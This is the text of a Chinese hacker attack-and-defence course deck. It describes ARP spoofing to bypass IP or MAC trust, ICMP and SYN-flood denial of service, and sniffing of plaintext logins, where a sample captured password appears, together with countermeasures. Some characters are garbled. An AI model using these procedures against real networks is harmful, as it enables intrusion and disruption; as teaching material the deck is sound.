這是一個(gè)關(guān)于黑客攻防基礎(chǔ)PPT課件，主要介紹黑客的定義；基于協(xié)議的攻擊手法和防御手段；常見(jiàn)的漏洞分析。第3章 黑客攻防剖析 本講概要 課程目標(biāo)：通過(guò)本章的學(xué)習(xí)，讀者應(yīng)能夠： 提示： 本章將會(huì)介紹和使用部分黑客軟件及相關(guān)工具模擬攻擊過(guò)程，所有軟件、工具都來(lái)自互聯(lián)網(wǎng)，本身均可能會(huì)被程序作者或者第三方加以利用，種植木馬、病毒等惡意程式。我們特別提醒嚴(yán)禁在生產(chǎn)機(jī)器（包括學(xué)校的網(wǎng)絡(luò)）上進(jìn)行安裝、使用。嚴(yán)禁在沒(méi)有老師的指導(dǎo)監(jiān)督下進(jìn)行任何模擬攻擊實(shí)驗(yàn)。指導(dǎo)老師需要嚴(yán)格遵循本課程是嚴(yán)要求，按照實(shí)驗(yàn)手冊(cè)操作，利用虛擬機(jī)技術(shù)并在物理隔離的網(wǎng)絡(luò)方可進(jìn)行模擬攻擊演示。 提示： 關(guān)于虛擬機(jī)的定義：Microsoft Virtual PC是一種軟件虛擬化解決方案，允許您在一個(gè)工作站上同時(shí)運(yùn)行多個(gè)操作系統(tǒng)。它節(jié)約了重新配置系統(tǒng)的時(shí)間，讓您的支持、開(kāi)發(fā)、測(cè)試和培訓(xùn)人員能夠更高效地工作。本章中所提及的黑客工具不建議個(gè)人通過(guò)網(wǎng)絡(luò)下載。3.1 “黑客”與“駭客” 黑客分類 黑客文化 3.2 黑客攻擊分類 攻擊方法的分類是安全研究的重要課題，對(duì)攻擊的定性和數(shù)據(jù)挖掘的方法來(lái)分析漏洞有重要意義。對(duì)于系統(tǒng)安全漏洞的分類法主要有兩種：RISOS分類法和Aslam分類法，對(duì)于針對(duì)TCP/IP協(xié)議族攻擊的分類也有幾種，歡迎點(diǎn)擊下載黑客攻防基礎(chǔ)PPT課件哦。

黑客攻防基礎(chǔ)PPT課件是由紅軟PPT免費(fèi)下載網(wǎng)推薦的一款學(xué)校PPT類型的PowerPoint.

第3章 黑客攻防剖析 本講概要 課程目標(biāo)：通過(guò)本章的學(xué)習(xí)，讀者應(yīng)能夠： 提示： 本章將會(huì)介紹和使用部分黑客軟件及相關(guān)工具模擬攻擊過(guò)程，所有軟件、工具都來(lái)自互聯(lián)網(wǎng)，本身均可能會(huì)被程序作者或者第三方加以利用，種植木馬、病毒等惡意程式。我們特別提醒嚴(yán)禁在生產(chǎn)機(jī)器（包括學(xué)校的網(wǎng)絡(luò)）上進(jìn)行安裝、使用。嚴(yán)禁在沒(méi)有老師的指導(dǎo)監(jiān)督下進(jìn)行任何模擬攻擊實(shí)驗(yàn)。指導(dǎo)老師需要嚴(yán)格遵循本課程是嚴(yán)要求，按照實(shí)驗(yàn)手冊(cè)操作，利用虛擬機(jī)技術(shù)并在物理隔離的網(wǎng)絡(luò)方可進(jìn)行模擬攻擊演示。 提示： 關(guān)于虛擬機(jī)的定義：Microsoft Virtual PC是一種軟件虛擬化解決方案，允許您在一個(gè)工作站上同時(shí)運(yùn)行多個(gè)操作系統(tǒng)。它節(jié)約了重新配置系統(tǒng)的時(shí)間，讓您的支持、開(kāi)發(fā)、測(cè)試和培訓(xùn)人員能夠更高效地工作。本章中所提及的黑客工具不建議個(gè)人通過(guò)網(wǎng)絡(luò)下載。 3.1 “黑客”與“駭客” 黑客分類 黑客文化 3.2 黑客攻擊分類 攻擊方法的分類是安全研究的重要課題，對(duì)攻擊的定性和數(shù)據(jù)挖掘的方法來(lái)分析漏洞有重要意義。對(duì)于系統(tǒng)安全漏洞的分類法主要有兩種：RISOS分類法和Aslam分類法，對(duì)于針對(duì)TCP/IP協(xié)議族攻擊的分類也有幾種。 3.2.1 按照TCP/IP協(xié)議層次進(jìn)行分類 這種分類是基于對(duì)攻擊所屬的網(wǎng)絡(luò)層次進(jìn)行的，TCP/IP協(xié)議傳統(tǒng)意義上分為四層，攻擊類型可以分成四類： 3.2.2 按照攻擊者目的分類按照攻擊者的攻擊目的可分為以下幾類：（1）DOS（拒絕服務(wù)攻擊）和DDOS（分布式拒絕服務(wù)攻擊）。 （2）Sniffer監(jiān)聽(tīng)。 3.2.2 按照攻擊者目的分類（3）會(huì)話劫持與網(wǎng)絡(luò)欺騙。（4）獲得被攻擊主機(jī)的控制權(quán)，針對(duì)應(yīng)用層協(xié)議的緩沖區(qū)溢出基本上目的都是為了得到被攻擊主機(jī)的shell。 3.3 基于協(xié)議的攻擊手法與防范 針對(duì)協(xié)議的攻擊手段非常多樣，下面對(duì)常見(jiàn)的協(xié)議攻擊方式進(jìn)行探討，主要內(nèi)容包括： 3.3.1 ARP協(xié)議漏洞 漏洞描述 ARP協(xié)議（Address Resolve Protocol，地址解析協(xié)議）工作在TCP/IP協(xié)議的第二層—數(shù)據(jù)鏈路層，用于將IP地址轉(zhuǎn)換為網(wǎng)絡(luò)接口的硬件地址（媒體訪問(wèn)控制地址，即MAC地址）。無(wú)論是任何高層協(xié)議的通信，最終都將轉(zhuǎn)換為數(shù)據(jù)鏈路層硬件地址的通訊。 為什么要將IP轉(zhuǎn)化成MAC呢？這是因?yàn)樵赥CP網(wǎng)絡(luò)環(huán)境下，一個(gè)IP包走到哪里、怎么走是靠路由表定義。但是，以太網(wǎng)在子網(wǎng)層上的傳輸是靠48位的MAC地址而決定的，當(dāng)IP包到達(dá)該網(wǎng)絡(luò)后，哪臺(tái)機(jī)器響應(yīng)這個(gè)IP包需要靠該IP包中所包含的MAC地址來(lái)識(shí)別，只有機(jī)器的MAC地址和該IP包中的MAC地址相同的機(jī)器才會(huì)應(yīng)答這個(gè)IP包。 3.3.1 ARP協(xié)議漏洞 (在命令行下輸入arp –a或arp –g即可獲得本地ARP轉(zhuǎn)換表) 3.3.1 ARP協(xié)議漏洞 例如，A主機(jī)的IP地址為192.168.0.1，它現(xiàn)在需要與IP為192.168.0.8的主機(jī)（主機(jī)B）進(jìn)行通信，那么將進(jìn)行以下動(dòng)作： A主機(jī)查詢自己的ARP緩存列表，如果發(fā)現(xiàn)具有對(duì)應(yīng)目的IP地址192.168.0.8的MAC地址項(xiàng)，則直接使用此MAC地址項(xiàng)構(gòu)造并發(fā)送以太網(wǎng)數(shù)據(jù)包，如果沒(méi)有發(fā)現(xiàn)對(duì)應(yīng)的MAC地址項(xiàng)則繼續(xù)下一步； A主機(jī)查詢自己的ARP解析請(qǐng)求廣播，目的MAC地址是FF:FF:FF:FF:FF:FF，請(qǐng)求IP為192.168.0.8的主機(jī)回復(fù)MAC地址； B主機(jī)收到ARP解析請(qǐng)求廣播后，恢復(fù)給A主機(jī)一個(gè)ARP應(yīng)答數(shù)據(jù)包，其中包含自己的IP地址和MAC地址； 3.3.1 ARP協(xié)議漏洞 A主機(jī)接收到B主機(jī)的ARP回復(fù)后，將B主機(jī)的MAC地址放入自己的ARP緩存列表，然后使用B主機(jī)的MAC地址作為目的MAC地址，B主機(jī)的IP地址（192.168.0.8）作為目的IP地址，構(gòu)造并發(fā)送以太網(wǎng)數(shù)據(jù)包； 如果A主機(jī)還要發(fā)送數(shù)據(jù)包給192.168.0.8，由于在ARP緩存列表中已經(jīng)具有IP地址192.168.0.8d MAC地址，所以A主機(jī)直接使用此MAC地址發(fā)送數(shù)據(jù)包，而不在發(fā)送ARP解析請(qǐng)求廣播。 ARP轉(zhuǎn)換表可以被攻擊者人為地更改欺騙，可以針對(duì)交換式及共享式進(jìn)行攻擊，輕者導(dǎo)致網(wǎng)絡(luò)不能正常工作（如網(wǎng)絡(luò)執(zhí)法官），重則成為黑客入侵跳板，從而給網(wǎng)絡(luò)安全造成極大隱患。 攻擊實(shí)現(xiàn) 下面介紹攻擊者如何在以太網(wǎng)中實(shí)現(xiàn)ARP欺騙。如下圖所示，三臺(tái)主機(jī)： A: IP地址 192.168.0.1；硬件地址 AA:AA:AA:AA:AA:AA。 B: IP地址 192.168.0.2；硬件地址 BB:BB:BB:BB:BB:BB。 C: IP地址 192.168.0.3；硬件地址 CC:CC:CC:CC:CC:CC。 攻擊實(shí)現(xiàn) 一個(gè)位于主機(jī)B的入侵者想非法進(jìn)入主機(jī)A，可是這臺(tái)主機(jī)上安裝有防火墻。通過(guò)收集資料得知這臺(tái)主機(jī)A的防火墻只對(duì)主機(jī)C有信任關(guān)系（開(kāi)放23端口（telnet））。而他必須要使用telnet來(lái)進(jìn)入主機(jī)A，這個(gè)時(shí)候他應(yīng)該如何處理呢？ 我們可以這樣去思考，入侵者必須讓主機(jī)A相信主機(jī)B就是主機(jī)C，如果主機(jī)A和主機(jī)C之間的信任關(guān)系是建立在IP地址之上的。攻擊者可以先通過(guò)各種拒絕式服務(wù)方式讓C這臺(tái)機(jī)器暫時(shí)宕掉，在機(jī)器C宕掉的同時(shí)，將機(jī)器B的IP地址改為192．168．0．3，B可以成功地通過(guò)23端口 telnet到機(jī)器A上面，而成功地繞過(guò)防火墻的限制。攻擊實(shí)現(xiàn) 但是，如果主機(jī)A和主機(jī)C之間的信任關(guān)系是建立在硬件地址的基礎(chǔ)上，通過(guò)上面方法就沒(méi)有作用了。這個(gè)時(shí)候還需要用ARP欺騙的手段讓主機(jī)A把自己的ARP緩存中的關(guān)于192.168.0.3映射的硬件地址改為主機(jī)B的硬件地址。 入侵者人為地制造一個(gè)arp_reply的響應(yīng)包，發(fā)送給想要欺騙的主機(jī)A，這是可以實(shí)現(xiàn)的，因?yàn)閰f(xié)議并沒(méi)有規(guī)定必須在接收到arp_echo請(qǐng)求包后才可以發(fā)送響應(yīng)包。攻擊實(shí)現(xiàn) 可以用來(lái)發(fā)送A_reply包的工具很多，例如攻擊者可以利用抓撥工具抓一個(gè)Arp響應(yīng)包，并進(jìn)行修改，修改的信息可以是：源IP、目標(biāo)IP、源MAC地址、目標(biāo)MAC地址，將修改的數(shù)據(jù)包通過(guò)Snifferpro（NAI公司出品的一款優(yōu)秀網(wǎng)絡(luò)協(xié)議分析軟件）等工具發(fā)送出去。 攻擊者這樣就可以通過(guò)發(fā)送虛假的 ARP響應(yīng)包來(lái)修改主機(jī)A上的動(dòng)態(tài)ARP緩存達(dá)到欺騙的目的。 具體的步驟如下： (1) 利用工具，進(jìn)行拒絕式服務(wù)攻擊（Arp free），讓主機(jī) C宕掉，暫時(shí)停止工作。 (2)這段時(shí)間里，入侵者把自己的IP改成192.0.0.3。 (3)用工具發(fā)一個(gè)源IP地址為192.168.0.3源MAC地址為BB:BB:BB:BB:BB:BB的包給主機(jī)A，要求主機(jī)A更新自己的ARP轉(zhuǎn)換表。 (4)主機(jī)更新了ARP表中關(guān)于主機(jī)C的IP-->MAC對(duì)應(yīng)關(guān)系。 (5)防火墻失效了，入侵的IP變成合法的MAC地址，可以Telnet了。 其實(shí)ARP欺騙還可以在交換網(wǎng)絡(luò)或不同網(wǎng)段下實(shí)現(xiàn)，所以必須注意防范。 ARP欺騙防范 知道了ARP欺騙的方法和危害，下面列出了一些防范方法 (1)不要把你的網(wǎng)絡(luò)安全信任關(guān)系建立在IP地址的基礎(chǔ)上或硬件MAC地址基礎(chǔ)上(RARP同樣存在欺騙的問(wèn)題)，較為理想的信任關(guān)系應(yīng)該建立在IP+MAC基礎(chǔ)上。 (2)設(shè)置在本機(jī)和網(wǎng)關(guān)設(shè)置靜態(tài)的MAC-->IP對(duì)應(yīng)表，不要讓主機(jī)刷新你設(shè)定好的轉(zhuǎn)換表。在三層交換機(jī)上設(shè)定靜態(tài)ARP表。 ARP欺騙防范 (3) 除非很有必要，否則停止使用ARP，將ARP作為永久條目保存在對(duì)應(yīng)表中。在Linux下可以用ifconfig－arp可以使網(wǎng)卡驅(qū)動(dòng)程序停止使用ARP。 (4) 在本機(jī)地址使用ARP，發(fā)送外出的通信使用代理網(wǎng)關(guān)。 (5) 修改系統(tǒng)拒收ICMP重定向報(bào)文，在Linux下可以通過(guò)在防火墻上拒絕ICMP重定向報(bào)文或者是修改內(nèi)核選項(xiàng)重新編譯內(nèi)核來(lái)拒絕接收ICMP重定向報(bào)文。在windows 2000下可以通過(guò)防火墻和IP策略拒絕接收ICMP報(bào)文(具體見(jiàn)《實(shí)驗(yàn)手冊(cè)》)。 3.3.2 ICMP協(xié)議漏洞 漏洞描述 ICMP是"Internet Control Message Protocol" (Internet控制消息協(xié)議)的縮寫(xiě)，是傳輸層的重要協(xié)議。它是TCP/IP協(xié)議簇的一個(gè)子協(xié)議，用于IP主機(jī)、路由器之間傳遞控制消息�？刂葡�息是指網(wǎng)絡(luò)通不通、主機(jī)是否可達(dá)、路由是否可用等網(wǎng)絡(luò)本身的消息。所以許多系統(tǒng)和防火墻并不會(huì)攔截ICMP報(bào)文，這給攻擊者帶來(lái)可乘之機(jī)。 網(wǎng)上有很多針對(duì)ICMP的攻擊工具可以很容易達(dá)到攻擊目的，其攻擊實(shí)現(xiàn)目標(biāo)主要為轉(zhuǎn)向連接攻擊和拒絕服務(wù)，下圖所示是一個(gè)簡(jiǎn)單的針對(duì)ICMP的攻擊工具。 3.3.2 ICMP協(xié)議漏洞：ICMP攻擊工具 3.3.2 ICMP協(xié)議漏洞 攻擊實(shí)現(xiàn) （1）ICMP轉(zhuǎn)向連接攻擊：攻擊者使用 ICMP“時(shí)間超出”或“目標(biāo)地址無(wú)法連接”的消息。這兩種ICMP消息都會(huì)導(dǎo)致一臺(tái)主機(jī)迅速放棄連接。攻擊只需偽造這些ICMP消息中的一條，并發(fā)送給通信中的兩臺(tái)主機(jī)或其中的一臺(tái)，就可以利用這種攻擊了。接著通信連接就會(huì)被切斷。當(dāng)一臺(tái)主機(jī)錯(cuò)誤地認(rèn)為信息的目標(biāo)地址不在本地網(wǎng)絡(luò)中的時(shí)候，網(wǎng)關(guān)通常會(huì)使用ICMP“轉(zhuǎn)向”消息。如果攻擊者偽造出一條“轉(zhuǎn)向”消息，它就可以導(dǎo)致另外一臺(tái)主機(jī)經(jīng)過(guò)攻擊者主機(jī)向特定連接發(fā)送數(shù)據(jù)包。 3.3.2 ICMP協(xié)議漏洞 (2) ICMP數(shù)據(jù)包放大(ICMP Smurf)：攻擊者向安全薄弱網(wǎng)絡(luò)所廣播的地址發(fā)送偽造的ICMP響應(yīng)數(shù)據(jù)包。那些網(wǎng)絡(luò)上的所有系統(tǒng)都會(huì)向受害計(jì)算機(jī)系統(tǒng)發(fā)送ICMP響應(yīng)的答復(fù)信息，占用了目標(biāo)系統(tǒng)的可用帶寬并導(dǎo)致合法通信的服務(wù)拒絕(DoS)。一個(gè)簡(jiǎn)單的Smurf攻擊通過(guò)使用將回復(fù)地址設(shè)置成受害網(wǎng)絡(luò)的廣播地址的ICMP應(yīng)答請(qǐng)求(Ping)來(lái)淹沒(méi)受害主機(jī)的方式進(jìn)行，最終導(dǎo)致該網(wǎng)絡(luò)的所有主機(jī)都對(duì)此ICMP應(yīng)答請(qǐng)求做出答復(fù)，導(dǎo)致網(wǎng)絡(luò)阻塞，比ping of death洪水的流量高出一或兩個(gè)數(shù)量級(jí)。更加復(fù)雜的Smurf將源地址改為第三方的受害者，最終導(dǎo)致第三方雪崩。 3.3.2 ICMP協(xié)議漏洞 (3) 死Ping攻擊(Ping of Death)：由于在早期的階段，路由器對(duì)包的最大尺寸都有限制，許多操作系統(tǒng)對(duì)TCP/IP棧的實(shí)現(xiàn)在ICMP包上都是規(guī)定64KB，并且在對(duì)包的標(biāo)題頭進(jìn)行讀取之后，要根據(jù)該標(biāo)題頭里包含的信息來(lái)為有效載荷生成緩沖區(qū)，當(dāng)產(chǎn)生畸形的，聲稱自己的尺寸超過(guò)ICMP上限的包也就是加載的尺寸超過(guò)64KB上限時(shí)，就會(huì)出現(xiàn)內(nèi)存分配錯(cuò)誤，導(dǎo)致TCP/IP堆棧崩潰，致使接受方宕機(jī)。 3.3.2 ICMP協(xié)議漏洞 (4)ICMP Ping淹沒(méi)攻擊：大量的PING信息廣播淹沒(méi)了目標(biāo)系統(tǒng)，使得它不能夠?qū)�合法的通信做出響�?yīng)。 (5)ICMP nuke攻擊：Nuke發(fā)送出目標(biāo)操作系統(tǒng)無(wú)法處理的信息數(shù)據(jù)包，從而導(dǎo)致該系統(tǒng)癱瘓。 (6)通過(guò)ICMP進(jìn)行攻擊信息收集：通過(guò)Ping命令來(lái)檢查目標(biāo)主機(jī)是否存活，依照返回TTL值判斷目標(biāo)主機(jī)操作系統(tǒng)。(如 LINUX應(yīng)答的 TTL字段值為64；FreeBSD/Sun Solaris/HP UX應(yīng)答的 TTL字段值為 255；Windows 95/98/Me應(yīng)答的TTL字段值為 32；Windows2000/NT應(yīng)答的TTL字段值為128)。攻擊實(shí)現(xiàn) ICMP攻擊的防范 策略一：對(duì)ICMP數(shù)據(jù)包進(jìn)行過(guò)濾。 雖然很多防火墻可以對(duì)ICMP數(shù)據(jù)包進(jìn)行過(guò)濾，但對(duì)于沒(méi)有安裝防火墻的主機(jī)，可以使用系統(tǒng)自帶的防火墻和安全策略對(duì)ICMP進(jìn)行過(guò)濾（見(jiàn)《實(shí)驗(yàn)手冊(cè)》）。 策略二：修改TTL值巧妙騙過(guò)黑客。 許多入侵者會(huì)通過(guò)Ping目標(biāo)機(jī)器，用目標(biāo)返回TTL值來(lái)判斷你的操作系統(tǒng)。既然入侵者相信TTL值所反映出來(lái)的結(jié)果，那么我們只要修改TTL值，入侵者就無(wú)法得知目標(biāo)操作系統(tǒng)了。操作步驟： ICMP攻擊的防范 3.3.3 TCP協(xié)議漏洞 TCP協(xié)議是攻擊者攻擊方法的思想源泉，主要問(wèn)題存在于TCP的三次握手協(xié)議上，正常的TCP三次握手過(guò)程如下：（1）請(qǐng)求端A發(fā)送一個(gè)初始序號(hào)ISNa的SYN報(bào)文；（2）被請(qǐng)求端 B收到 A的 SYN報(bào)文后，發(fā)送給 A自己的初始序列號(hào) ISNb，同時(shí)將 ISNa＋1作為確認(rèn)的SYN＋ACK報(bào)文； 3.3.3 TCP協(xié)議漏洞 （3）A對(duì)SYN＋ACK報(bào)文進(jìn)行確認(rèn)，同時(shí)將 ISNa＋1，ISNb+1發(fā)送給 B，TCP連接完成。 針對(duì)TCP協(xié)議的攻擊的基本原理是：TCP協(xié)議三次握手沒(méi)有完成的時(shí)候，被請(qǐng)求端B-般都會(huì)重試（即再給 A發(fā)送 SYN＋ACK報(bào)文）并等待一段時(shí)間（SYN timeout），這常常被用來(lái)進(jìn)行DOS、Land（在Land攻擊中，一個(gè)特別打造的SYN包其原地址和目標(biāo)地址都被設(shè)置成某一個(gè)服務(wù)器地址，此舉將導(dǎo)致接收服務(wù)器向它自己的地址發(fā)送SYN-ACK消息，結(jié)果該地址又發(fā)回ACK消息并創(chuàng)建一個(gè)空連接，每一個(gè)這樣的連接都將保留直至超時(shí)，對(duì)Land攻擊反應(yīng)不同，許多 UNIX系統(tǒng)將崩潰，NT變得極其緩慢）和 SYN Flood攻擊是典型的攻擊方式。 攻擊實(shí)現(xiàn) 在 SYN Flood攻擊中，黑客機(jī)器向受害主機(jī)發(fā)送大量偽造源地址的 TCP SYN報(bào)文，受害主機(jī)分配必要的資源，然后向源地址返回SYN＋ACK包，并等待源端返回ACK包，如圖所示。由于源地址是偽造的，所以源端永遠(yuǎn)都不會(huì)返回ACK報(bào)文，受害主機(jī)繼續(xù)發(fā)送SYN＋ACK包，并將半連接放入端口的積壓隊(duì)列中，雖然一般的主機(jī)都有超時(shí)機(jī)制和默認(rèn)的重傳次數(shù)，但是由于端口的半連接隊(duì)列的長(zhǎng)度是有限的，如果不斷地向受害主機(jī)發(fā)送大量的 TCP SYN報(bào)文，半連接隊(duì)列就會(huì)很快填滿，服務(wù)器拒絕新的連接，將導(dǎo)致該端口無(wú)法響應(yīng)其他機(jī)器進(jìn)行的連接請(qǐng)求，最終使受害主機(jī)的資源耗盡。攻擊實(shí)現(xiàn) 防御方法 針對(duì)SYN Flood的攻擊防范措施主要有：一類是通過(guò)防火墻、路由器等過(guò)濾網(wǎng)關(guān)防護(hù)，另一類是通過(guò)加固TCP/IP協(xié)議棧防范。 網(wǎng)關(guān)防護(hù)的主要技術(shù)有：SYN-cookie技術(shù)和基于監(jiān)控的源地址狀態(tài)、縮短SYN Timeout時(shí)間。SYN-cookie技術(shù)實(shí)現(xiàn)了無(wú)狀態(tài)的握手，避免了 SYN Flood的資源消耗�；�于監(jiān)控的源地址狀態(tài)技術(shù)能夠?qū)γ恳粋�(gè)連接服務(wù)器的IP地址的狀態(tài)進(jìn)行監(jiān)控，主動(dòng)采取措施避免SYN Flood攻擊的影響。 防御方法 為防范SYN攻擊，windows 2000系統(tǒng)的TCP/IP協(xié)議棧內(nèi)嵌了SynAttackProtect機(jī)制，Win2003系統(tǒng)也采用此機(jī)制。SynAttackPotect機(jī)制是通過(guò)關(guān)閉某些socket選項(xiàng)，增加額外的連接指示和減少超時(shí)時(shí)間，使系統(tǒng)能處理更多的SYN連接，以達(dá)到防范SYN攻擊的目的。默認(rèn)情況下，Win2000操作系統(tǒng)并不支持SynAttackProtect保護(hù)機(jī)制，需要在注冊(cè)表以下位置增加 SynAttackProtect鍵值： HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 防御方法 當(dāng)SynAttackProtect值（如無(wú)特別說(shuō)明，本文提到的注冊(cè)表鍵值都為十六進(jìn)制）為0或不設(shè)置時(shí)，系統(tǒng)不受SynAttackProtect保護(hù)。當(dāng)SynAttackProtect值為1時(shí)，系統(tǒng)通過(guò)減少重傳次數(shù)和延遲未連接時(shí)路由緩沖項(xiàng)（route cache entry）防范 SYN攻擊。 對(duì)于個(gè)人用戶，可使用一些第三方的個(gè)人防火墻；對(duì)于企業(yè)用戶，購(gòu)買企業(yè)級(jí)防火墻硬件，都可有效地防范針對(duì) TCP三次握手的拒絕式服務(wù)攻擊。 3.3.4 其他協(xié)議明文傳輸漏洞漏洞描述 TCP/IP協(xié)議數(shù)據(jù)流采用明文傳輸，是網(wǎng)絡(luò)安全的一大隱患，目前所使用的Ftp、http、POP和telnet服務(wù)在本質(zhì)上都是不安全的，因?yàn)樗鼈冊(cè)诰W(wǎng)絡(luò)上用明文傳送口令和數(shù)據(jù)，攻擊者可以很容易地通過(guò)嗅探等方式截獲這些口令和數(shù)據(jù)。 嗅探偵聽(tīng)主要有兩種途徑，一種是將偵聽(tīng)工具軟件放到網(wǎng)絡(luò)連接的設(shè)備或者放到可以控制網(wǎng)絡(luò)連接設(shè)備的電腦上，這里的網(wǎng)絡(luò)連接設(shè)備指的是網(wǎng)關(guān)服務(wù)器、路由器等。當(dāng)然要實(shí)現(xiàn)這樣的效果可能還需要其他黑客技術(shù)，比如通過(guò)木馬方式將嗅探器發(fā)給某個(gè)網(wǎng)絡(luò)管理員，使漏洞描述 其不自覺(jué)地為攻擊者進(jìn)行了安裝。另外一種是針對(duì)不安全的局域網(wǎng)（采用交換hub實(shí)現(xiàn)），放到個(gè)人電腦上就可以實(shí)現(xiàn)對(duì)整個(gè)局域網(wǎng)的偵聽(tīng)。它的原理是這樣的：共享hub獲得一個(gè)子網(wǎng)內(nèi)需要接收的數(shù)據(jù)時(shí)，并不是直接發(fā)送到指定主機(jī)，而是通過(guò)廣播方式發(fā)送到每個(gè)電腦，對(duì)于處于接受者地位的電腦就會(huì)處理該數(shù)據(jù)，而其他非接受者的電腦就會(huì)過(guò)濾這些數(shù)據(jù)，這些操作與電腦操作者無(wú)關(guān)，是系統(tǒng)自動(dòng)完成的，但是電腦操作者如果有意的話，是可以將那些原本不屬于他的數(shù)據(jù)打開(kāi)的。 3.3.4 其他協(xié)議明文傳輸漏洞 攻擊實(shí)現(xiàn) 網(wǎng)絡(luò)抓包工具目前很多，如HTTPSniffer、SpyNet、Sniffit、Ettercap、Snarp、IRIS。這里要使用到一款抓包工具 Winsock Expert，它可以用來(lái)監(jiān)視和截獲指定進(jìn)程網(wǎng)絡(luò)數(shù)據(jù)的傳輸，對(duì)測(cè)試http通信過(guò)程非常有用。黑客經(jīng)常使用該工具來(lái)修改網(wǎng)絡(luò)發(fā)送和接收數(shù)據(jù)，協(xié)助完成很多網(wǎng)頁(yè)腳本的入侵工作。 我們用 Winsock Expert來(lái)驗(yàn)證 http協(xié)議明文傳輸以及潛在的危險(xiǎn)。 攻擊實(shí)現(xiàn) Winsock Expert 的使用非常簡(jiǎn)單。軟件運(yùn)行后界面如下： 攻擊實(shí)現(xiàn) （l）點(diǎn)擊工具欄上的“打開(kāi)”按鈕，打開(kāi)監(jiān)視進(jìn)程選擇對(duì)話框。 （2）在其中找到需要監(jiān)視的進(jìn)程后，點(diǎn)擊左邊的加號(hào)按鈕，展開(kāi)后選擇需要監(jiān)視的進(jìn)程即可。以監(jiān)視IE瀏覽器網(wǎng)絡(luò)數(shù)據(jù)為例，可以在打開(kāi)的對(duì)話窗口中找到進(jìn)程項(xiàng)目名“iexplorer．exe” 并展開(kāi)，在其下選擇正在登錄的網(wǎng)頁(yè)名稱，例如“新浪首頁(yè)-Microsoft Internet Explorer”的進(jìn)程。選擇該進(jìn)程后，點(diǎn)擊對(duì)話框中的“打開(kāi)”按鈕，返回主界面開(kāi)始對(duì)本機(jī)與“新浪首頁(yè)” 網(wǎng)站的數(shù)據(jù)交換進(jìn)行監(jiān)控。如果點(diǎn)擊對(duì)話框中的“刷新”按鈕的話，可以刷新列表中的進(jìn)程項(xiàng)目名。 （3）在主界面的上部窗口中，將即時(shí)顯示本地主機(jī)與遠(yuǎn)程網(wǎng)站進(jìn)行的每一次數(shù)據(jù)交換，見(jiàn)下圖。 攻擊實(shí)現(xiàn) （4）當(dāng)你在新浪網(wǎng)站首頁(yè)輸入郵箱用戶名和密碼并提交登陸時(shí)，主界面開(kāi)始對(duì)本機(jī)與“新浪首頁(yè)”網(wǎng)站的數(shù)據(jù)交換全部記錄，我們從抓包的結(jié)果來(lái)看，用戶所提交的郵箱賬戶和密碼全部以明文顯示在抓包記錄中（見(jiàn)圖中陰影部分，表示用戶為ahpu00，密碼是8919703）。當(dāng)然這種交換數(shù)據(jù)也可被在共享式局域網(wǎng)內(nèi)或者在路由、交換節(jié)點(diǎn)被截獲，攻擊者可以輕松獲得大量重要賬戶、密碼、關(guān)鍵數(shù)據(jù)，可見(jiàn)明文傳輸威脅之大。 漏洞描述 （1）從邏輯或物理上對(duì)網(wǎng)絡(luò)分段，網(wǎng)絡(luò)分段通常被認(rèn)為是控制網(wǎng)絡(luò)廣播風(fēng)暴的一種基本手段，但其實(shí)也是保證網(wǎng)絡(luò)安全的一項(xiàng)措施。其目的是將非法用戶與敏感的網(wǎng)絡(luò)資源相互隔離，從而防止可能的非法監(jiān)聽(tīng)。 （2）以交換式集線器代替共享式集線器，使單播包僅在兩個(gè)節(jié)點(diǎn)之間傳送，從而防止非法監(jiān)聽(tīng)。當(dāng)然，交換式集線器只能控制單播包而無(wú)法控制廣播包（Broadcast packet）和多播包 （Multicast Packet）。但廣播包和多播包內(nèi)的關(guān)鍵信息，要遠(yuǎn)遠(yuǎn)少于單播包。 漏洞描述 （3）使用加密技術(shù)，數(shù)據(jù)經(jīng)過(guò)加密后，通過(guò)監(jiān)聽(tīng)仍然可以得到傳送的信息，但顯示的是亂碼。使用加密協(xié)議對(duì)敏感數(shù)據(jù)進(jìn)行加密，對(duì)于Web服務(wù)器敏感數(shù)據(jù)提交可以使用https代理http；用 PGP（PGP--Pretty Good Privacy，這是一個(gè)基于 RSA公鑰加密體系的郵件加密軟件，它提出了公共鑰匙或不對(duì)稱文件加密和數(shù)字簽名。）對(duì)郵件進(jìn)行加密； （4）劃分VLAN，運(yùn)用 VLAN（虛擬局域網(wǎng)）技術(shù)，將以太網(wǎng)通信變?yōu)辄c(diǎn)到點(diǎn)通信，可以防止大部分基于網(wǎng)絡(luò)監(jiān)聽(tīng)的入侵。 （5）使用動(dòng)態(tài)口令技術(shù)，使得偵聽(tīng)結(jié)果再次使用時(shí)無(wú)效。 3.4 操作系統(tǒng)漏洞攻擊 無(wú)論是UNIX、Windows還是其他操作系統(tǒng)都存在著安全漏洞。主流操作系統(tǒng)Windows更是眾矢之的，每次微軟的系統(tǒng)漏洞被發(fā)現(xiàn)后，針對(duì)該漏洞利用的惡意代碼很快就會(huì)出現(xiàn)在網(wǎng)上，一系列案例證明。從漏洞被發(fā)現(xiàn)到惡意代碼出現(xiàn)，中間的時(shí)差開(kāi)始變得越來(lái)越短，所以必須時(shí)刻關(guān)注操作系統(tǒng)的最新漏洞，以保證系統(tǒng)安全。 本節(jié)重點(diǎn)介紹一些針對(duì)Windows系統(tǒng)以及服務(wù)的經(jīng)典漏洞利用原理和防范方法。 3.4.1 輸入法漏洞 漏洞描述 在安裝Windows 2000簡(jiǎn)體中文版的過(guò)程中，默認(rèn)情況下同時(shí)安裝了各種簡(jiǎn)體中文輸入法。而Microsoft自Windows 2000開(kāi)始，支持中文用戶名。這些隨系統(tǒng)裝入的輸入法可以在系統(tǒng)登錄界面中使用，以便用戶能使用基于中文字符的用戶標(biāo)識(shí)和密碼登錄到系統(tǒng)，理論上，在未登陸情況下，應(yīng)限制提供給用戶的系統(tǒng)功能。然而，在SP2補(bǔ)丁以前，默認(rèn)安裝的情況 下，Windows 2000中的簡(jiǎn)體中文輸入法不能正確地檢測(cè)當(dāng)前的狀態(tài)，導(dǎo)致在系統(tǒng)登錄界面中提供了不應(yīng)有的功能。進(jìn)而，一些別有用心的用戶可以通過(guò)直接操作該系統(tǒng)的登陸界面得到 當(dāng)前系統(tǒng)權(quán)限，運(yùn)行其選擇的代碼，更改系統(tǒng)配置，新建用戶，添加或刪除系統(tǒng)服務(wù)，添加、更改或刪除數(shù)據(jù)，或執(zhí)行其他非法操作。攻擊實(shí)現(xiàn) 